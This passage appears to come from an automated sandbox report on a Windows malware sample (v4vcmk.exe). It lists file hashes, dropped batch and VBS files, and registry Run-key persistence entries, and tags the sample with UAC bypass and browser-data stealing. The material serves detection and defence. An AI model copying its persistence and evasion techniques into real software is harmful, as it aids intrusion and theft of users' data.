SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/4360-200-0x0000000000400000-0x000000000043D000-memory.dmp

C:\ProgramData\WwgMQcMw\LyocAoAM.inf

MD5 f68e57e52dfdc91de4a3ccf12d8e9a93
SHA1 eb75d4c2f6df58f86494c80e641eecc1a9af459e
SHA256 931db786e141419331c5f5a49e9a07a741c5054ea1ad78d6e12bc45d6b1757c3
SHA512 dc38bbdad8d23b9749185df17d8e15e2018bbb2296a64acaf06cc008c9970368fcfd6f02e00fb998bb77e0372c40382aec23cb8984f850ae4759398aaa1c1a6e

C:\Users\Admin\AppData\Local\Temp\lmQkwEsU.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/3692-205-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ZsYEsEkg.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\fSgEsIQI\dAkcYIYg.inf

MD5 f68e57e52dfdc91de4a3ccf12d8e9a93
SHA1 eb75d4c2f6df58f86494c80e641eecc1a9af459e
SHA256 931db786e141419331c5f5a49e9a07a741c5054ea1ad78d6e12bc45d6b1757c3
SHA512 dc38bbdad8d23b9749185df17d8e15e2018bbb2296a64acaf06cc008c9970368fcfd6f02e00fb998bb77e0372c40382aec23cb8984f850ae4759398aaa1c1a6e

memory/4856-210-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NqcYUAQk.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/4320-213-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2400-214-0x0000000000400000-0x000000000043D000-memory.dmp

memory/748-215-0x0000000000400000-0x000000000043D000-memory.dmp

memory/5060-216-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3880-217-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4008-218-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3396-219-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4804-220-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2564-221-0x0000000000400000-0x000000000043D000-memory.dmp

memory/5104-222-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3692-223-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3508-224-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4216-225-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4124-226-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1976-227-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4524-228-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3788-229-0x0000000000400000-0x000000000043D000-memory.dmp

memory/5008-230-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4124-231-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4552-232-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4576-233-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3400-234-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4228-235-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4000-236-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4676-237-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3760-238-0x0000000000400000-0x000000000043D000-memory.dmp

memory/5056-239-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3548-240-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1868-241-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4216-244-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4608-243-0x000002C39CA80000-0x000002C39CA90000-memory.dmp

memory/4608-242-0x000002C39CA20000-0x000002C39CA30000-memory.dmp

memory/4784-245-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4608-246-0x000002C39F140000-0x000002C39F144000-memory.dmp

memory/3608-247-0x0000000000400000-0x000000000043D000-memory.dmp

memory/296-248-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4500-249-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4784-250-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2020-251-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3560-252-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4356-253-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2680-254-0x0000000000400000-0x000000000043D000-memory.dmp

memory/752-255-0x0000000000400000-0x000000000043D000-memory.dmp

memory/600-256-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4720-257-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4764-258-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2188-259-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2500-260-0x0000000000400000-0x000000000043D000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-02-10 06:54

Reported

2022-02-10 06:57

Platform

win7-en-20211208

Max time kernel

155s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion

UAC bypass

evasion trojan

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\International\Geo\Nation C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\PKsMQUYQ.exe = "C:\\ProgramData\\DmwYMgQc\\PKsMQUYQ.exe" C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\TIkMIsss.exe = "C:\\Users\\Admin\\mQUgQkwg\\TIkMIsss.exe" C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\YioMwUEg.exe = "C:\\ProgramData\\xcIAYMoI\\YioMwUEg.exe" C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\QgAscQoI.exe = "C:\\Users\\Admin\\hYgwkYwM\\QgAscQoI.exe" C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\QgAscQoI.exe = "C:\\Users\\Admin\\hYgwkYwM\\QgAscQoI.exe" C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\PKsMQUYQ.exe = "C:\\ProgramData\\DmwYMgQc\\PKsMQUYQ.exe" C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1572 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Users\Admin\hYgwkYwM\QgAscQoI.exe
PID 1572 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Users\Admin\hYgwkYwM\QgAscQoI.exe
PID 1572 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Users\Admin\hYgwkYwM\QgAscQoI.exe
PID 1572 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Users\Admin\hYgwkYwM\QgAscQoI.exe
PID 1572 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe
PID 1572 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe
PID 1572 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe
PID 1572 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe
PID 1572 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1572 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1572 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1572 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1572 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1572 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1572 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1572 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 1400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1632 wrote to memory of 1400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
